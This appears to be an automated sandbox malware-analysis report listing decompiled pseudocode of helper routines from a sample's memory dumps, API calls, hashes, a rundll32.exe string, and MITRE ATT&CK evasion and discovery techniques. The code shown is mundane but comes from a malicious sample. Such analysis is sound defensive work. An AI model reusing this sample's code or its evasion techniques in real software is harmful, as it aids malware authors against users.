sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00DC5B10(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0xdcd2dc; // 0x5119630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xdcd2dc; // 0x5119630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0xdcd030) {
					HeapFree( *0xdcd1f0, 0, _t8);
				}
				_t14[1] = E00DC752B(_v0, _t14);
				_t11 =  *0xdcd2dc; // 0x5119630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x00dc5b10
0x00dc5b10
0x00dc5b19
0x00dc5b29
0x00dc5b29
0x00dc5b2e
0x00dc5b33
0x00000000
0x00000000
0x00dc5b23
0x00dc5b23
0x00dc5b35
0x00dc5b39
0x00dc5b4b
0x00dc5b4b
0x00dc5b5b
0x00dc5b5e
0x00dc5b63
0x00dc5b67
0x00dc5b6d

APIs

RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC5B19
Sleep.KERNEL32(0000000A,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC5B23
HeapFree.KERNEL32(00000000,00000000,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC5B4B
RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC5B67

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 5844a40b404768d260a33697bf821742fdcdf596e79e306873e89a4faf600d4e
Instruction ID: 1115b293c1b2ea26e7f78457bbb6d54802b339dd7f1cff449c189de04d23bc43
Opcode Fuzzy Hash: 5844a40b404768d260a33697bf821742fdcdf596e79e306873e89a4faf600d4e
Instruction Fuzzy Hash: 70F05E70222743DFD7249F68EC49F057BA6AB14340F084418F64AC7360C630EC41EB34

Uniqueness

Uniqueness Score: -1.00%

Function 00DC310C, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DC310C() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0xdcd224; // 0x328
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0xdcd264; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0xdcd224; // 0x328
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0xdcd1f0; // 0x4d20000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x00dc310c
0x00dc3113
0x00dc315d
0x00dc315f
0x00dc315f
0x00dc3117
0x00dc311d
0x00dc3122
0x00dc3126
0x00dc312c
0x00dc3133
0x00000000
0x00000000
0x00dc3135
0x00dc313a
0x00000000
0x00000000
0x00000000
0x00dc313a
0x00dc313c
0x00dc3144
0x00dc3147
0x00dc3147
0x00dc314d
0x00dc3154
0x00dc3157
0x00dc3157
0x00000000

APIs

SetEvent.KERNEL32(00000328,00000001,00DCA615), ref: 00DC3117
SleepEx.KERNEL32(00000064,00000001), ref: 00DC3126
CloseHandle.KERNEL32(00000328), ref: 00DC3147
HeapDestroy.KERNEL32(04D20000), ref: 00DC3157

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: 3895220531629052a63e6a2cda59f3790baac9375e3daab942f531ec06d4ddb8
Instruction ID: ac218451577f7c972a66d84b275889fed3d821a6e9e14a033dbff87d5427a1ac
Opcode Fuzzy Hash: 3895220531629052a63e6a2cda59f3790baac9375e3daab942f531ec06d4ddb8
Instruction Fuzzy Hash: BDF03071714313DFDB209B74AD08F06779DAB14BA1B0C4128FA09D33A4CA20C9019674

Uniqueness

Uniqueness Score: -1.00%

Function 702A9E4D, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000), ref: 702A9E64
GetLastError.KERNEL32(?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000,00000000,00000000,?,702A625F,00000000), ref: 702A9E70

Part of subcall function 702A9E36: CloseHandle.KERNEL32(702C08A0,702A9E80,?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000,00000000,00000000), ref: 702A9E46

___initconout.LIBCMT ref: 702A9E80

Part of subcall function 702A9DF8: CreateFileW.KERNEL32(702B3128,40000000,00000003,00000000,00000003,00000000,00000000,702A9E27,702A97E4,00000000,?,702A5D0B,00000000,00000020,00000000,00000000), ref: 702A9E0B

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,702A97F7,00000000,00000001,00000000,00000000,?,702A5D0B,00000000,00000020,00000000,00000000), ref: 702A9E95

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 332b57c3e3bdb6642612a6d165a36e3a27de495bfb4b25c3cb98276ed8c8dfce
Instruction ID: b1a3587b053a535e1ffd6582d65fc01e6330efb70fd29e9c60c7ec343ff37ae1
Opcode Fuzzy Hash: 332b57c3e3bdb6642612a6d165a36e3a27de495bfb4b25c3cb98276ed8c8dfce
Instruction Fuzzy Hash: 1EF09E77541115BFCB225F97CC09A8E7E66EB04761F254511FE1995120CA319860EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00DC10E4, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00DC10E4() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xdcd2dc; // 0x5119630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xdcd2dc; // 0x5119630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xdcd2dc; // 0x5119630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xdce882) {
					HeapFree( *0xdcd1f0, 0, _t10);
					_t7 =  *0xdcd2dc; // 0x5119630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00dc10e4
0x00dc10ed
0x00dc10fd
0x00dc10fd
0x00dc1102
0x00dc1107
0x00000000
0x00000000
0x00dc10f7
0x00dc10f7
0x00dc1109
0x00dc110e
0x00dc1112
0x00dc1125
0x00dc112b
0x00dc112b
0x00dc1134
0x00dc1136
0x00dc113a
0x00dc1140

APIs

RtlEnterCriticalSection.NTDLL(051195F0), ref: 00DC10ED
Sleep.KERNEL32(0000000A,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC10F7
HeapFree.KERNEL32(00000000,?,?,?,00DC79CC,?,?,?,?,?,00DC87DD,?,00000001), ref: 00DC1125
RtlLeaveCriticalSection.NTDLL(051195F0), ref: 00DC113A

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 056f6ea576c8d7613a504988f3f6e3e335215bc08c9ba9a6581ca3b68007a86c
Instruction ID: f879b33f0134389e591f246b3a70de81ad7b50ca28ccf38071fa4db470bd0622
Opcode Fuzzy Hash: 056f6ea576c8d7613a504988f3f6e3e335215bc08c9ba9a6581ca3b68007a86c
Instruction Fuzzy Hash: 6DF0D4B8222783DFE7188B25DC49F16B7A5AB49340F084028FA06C7361CA34EC01EB38

Uniqueness

Uniqueness Score: -1.00%

Function 70298FAF, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 403COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,702B3DA0,?,?,?,?,?,?,?,?,?,?,?,702B3DA0,702910AD), ref: 70299055
GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,702B3DA0,702910AD), ref: 70299079

Strings

\, xrefs: 70299176

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: Module$FileHandleName
String ID: \
API String ID: 4146042529-2967466578
Opcode ID: 2fb0cab3dc39b85a61926c32d75950bdf5e9b668bfeeadcd6836d19e4e1b31e3
Instruction ID: 23367d7d3f8d5fc305c559fe5646748f658af0f2c45f40463c44d4c9570acc73
Opcode Fuzzy Hash: 2fb0cab3dc39b85a61926c32d75950bdf5e9b668bfeeadcd6836d19e4e1b31e3
Instruction Fuzzy Hash: F3C1D4B3A2010A6AD7525F299C49FDF727DAF85314F240168FC0AF6104F7309A66CEA9

Uniqueness

Uniqueness Score: -1.00%

Function 70299EEA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 70299F2D, 70299F6A

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 0b9ebaad31367b67bffcfa1269f85cf18e040e3732b2a44162da137f5ccb3589
Instruction ID: 2c9d857b3794aaa320752c8e6079ddd77e9c83904727717174070afcbeb50a4e
Opcode Fuzzy Hash: 0b9ebaad31367b67bffcfa1269f85cf18e040e3732b2a44162da137f5ccb3589
Instruction Fuzzy Hash: AB416473A20215AFDB129F9DC881F9EBBBDEB85310F20406AF415F7250D6709A60DB99

Uniqueness

Uniqueness Score: -1.00%

Function 702960C0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 702960FF
__IsNonwritableInCurrentImage.LIBCMT ref: 702961B3

Strings

csm, xrefs: 7029619D

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 215ee84c68b5d4631635bc45f0ce225f11fd74d4bb42a3b9ce3cd7a4703ae2b2
Instruction ID: 9b36a88d91dd880d67e69cdcfe0556302509b4863c5f700cb3c525099013bc38
Opcode Fuzzy Hash: 215ee84c68b5d4631635bc45f0ce225f11fd74d4bb42a3b9ce3cd7a4703ae2b2
Instruction Fuzzy Hash: 84415476A102199FCB00DF68CC88B9E7BF5AF45314F108159EC1A6B352D731E925CF98

Uniqueness

Uniqueness Score: -1.00%

Function 702A1040, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 702A0DE9: GetOEMCP.KERNEL32(00000000,702A105B,702C0004,00000000,7029C932,7029C932,00000000,00000000,702C0004), ref: 702A0E14

_free.LIBCMT ref: 702A10B8

Strings

IS, xrefs: 702A114F

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free
String ID: IS
API String ID: 269201875-349531120
Opcode ID: cb897b8e25b38afbaf20cac30b9c1bd13552f0e0c7177130dafe7264d713d93b
Instruction ID: d2d19d08471cb9e7aeba2688c54013d03fd5d44596223701cc10c12be2f09354
Opcode Fuzzy Hash: cb897b8e25b38afbaf20cac30b9c1bd13552f0e0c7177130dafe7264d713d93b
Instruction Fuzzy Hash: 673182B35042899FDB01CF69C881B8E7BB5AF45320F11415AED15A72A0EF71ED60CF51

Uniqueness

Uniqueness Score: -1.00%

Function 70296013, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(E06D7363,00000001,00000003,CB)p,?,702AC9C5,?,70294243,?,702BECC4), ref: 70296073

Strings

CB)p, xrefs: 7029601E
CB)p, xrefs: 70296060, 70296063

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ExceptionRaise
String ID: CB)p$CB)p
API String ID: 3997070919-3776206364
Opcode ID: 99fa81dbf4eae32ab76ea8e16a157156cc255d151618bfe31b80aaeff7b4713d
Instruction ID: e9888d5c0ad010cdacde6ab930e63b608ecb999ca75cdb140491658033c4f858
Opcode Fuzzy Hash: 99fa81dbf4eae32ab76ea8e16a157156cc255d151618bfe31b80aaeff7b4713d
Instruction Fuzzy Hash: 0801AD77A00209AFD7019F69D884BAEBBF8FF48704F11405AED16AB391DB70AD11CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00DC46EF, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00DC46EF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00DC75C4(_t2);
				if(_t34 != 0) {
					_t30 = E00DC75C4(_t28);
					if(_t30 == 0) {
						E00DC4C31(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00DCA97B(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00DCA97B(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x00dc46ef
0x00dc46f9
0x00dc46fb
0x00dc4701
0x00dc4701
0x00dc470a
0x00dc470e
0x00dc471a
0x00dc471e
0x00dc4792
0x00dc4720
0x00dc4720
0x00dc4724
0x00dc472b
0x00dc472e
0x00dc4748
0x00dc4737
0x00dc4737
0x00dc473b
0x00dc473e
0x00dc4743
0x00dc4743
0x00dc474d
0x00dc4775
0x00dc477b
0x00dc477e
0x00dc474f
0x00dc4751
0x00dc4759
0x00dc4764
0x00dc4769
0x00dc4769
0x00dc4785
0x00dc478c
0x00dc478d
0x00dc478d
0x00dc471e
0x00dc479d

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00DC8390,00000000,00000000,00000000,05119698,?,?,00DC4680,?,05119698), ref: 00DC46FB

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

Part of subcall function 00DCA97B: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00DC4729,00000000,00000001,00000001,?,?,00DC8390,00000000,00000000,00000000,05119698), ref: 00DCA989
Part of subcall function 00DCA97B: StrChrA.SHLWAPI(?,0000003F,?,?,00DC8390,00000000,00000000,00000000,05119698,?,?,00DC4680,?,05119698,0000EA60,?), ref: 00DCA993

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00DC8390,00000000,00000000,00000000,05119698,?,?,00DC4680), ref: 00DC4759
lstrcpy.KERNEL32(00000000,00000000), ref: 00DC4769
lstrcpy.KERNEL32(00000000,00000000), ref: 00DC4775

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 903f7621e9980a4f739a9a095e57cd6b393145e3ad2c2a663db35eb8c6786988
Instruction ID: 97d8a718dea6938c2261b6a5040ed809de5318656dad45d381cae3b029b68d7c
Opcode Fuzzy Hash: 903f7621e9980a4f739a9a095e57cd6b393145e3ad2c2a663db35eb8c6786988
Instruction Fuzzy Hash: E421907650425BEBCB029F68CC95FAE7FA8EF17390B194058F9499B252D734C9019BF0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC7AC8, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DC7AC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00DC75C4(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x00dc7add
0x00dc7ae1
0x00dc7aeb
0x00dc7af2
0x00dc7af5
0x00dc7af7
0x00dc7aff
0x00dc7b04
0x00dc7b12
0x00dc7b17
0x00dc7b21

APIs

lstrlenW.KERNEL32(004F0053,74B05520,?,00000008,0511931C,?,00DC4CC5,004F0053,0511931C,?,?,?,?,?,?,00DC3858), ref: 00DC7AD8
lstrlenW.KERNEL32(00DC4CC5,?,00DC4CC5,004F0053,0511931C,?,?,?,?,?,?,00DC3858), ref: 00DC7ADF

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,00DC4CC5,004F0053,0511931C,?,?,?,?,?,?,00DC3858), ref: 00DC7AFF
memcpy.NTDLL(74B069A0,00DC4CC5,00000002,00000000,004F0053,74B069A0,?,?,00DC4CC5,004F0053,0511931C), ref: 00DC7B12

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 6226db1c20925bbda6c32314c2787e605fe68d506af07d84656545ba7f01eb98
Instruction ID: 5505b78e7017caf0de2e670ef6a5e643addbcf8184f95263c37382bd1f8151b6
Opcode Fuzzy Hash: 6226db1c20925bbda6c32314c2787e605fe68d506af07d84656545ba7f01eb98
Instruction Fuzzy Hash: F7F04972900119BBCF11EFE8CC89D8E7BACEF083547054066FD08D7202E631EA109BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC74AF, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0511887A,00000000,00000000,00000000,00DC6CA0,00000000), ref: 00DC74BF
lstrlen.KERNEL32(?), ref: 00DC74C7

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

lstrcpy.KERNEL32(00000000,0511887A), ref: 00DC74DB
lstrcat.KERNEL32(00000000,?), ref: 00DC74E6

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 22c9170d3d423f8e97f8d4d608c3bb83478e2cea7e7f73191f229f5957bb1da2
Instruction ID: f2fde5b7a7c264688bfa279d82d656141ef894cc89506d76a170d928a40f5018
Opcode Fuzzy Hash: 22c9170d3d423f8e97f8d4d608c3bb83478e2cea7e7f73191f229f5957bb1da2
Instruction Fuzzy Hash: 23E06D73505223A78A119BE49C48C9BBBACEF89621305041AF604D3210C72088059BF0

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
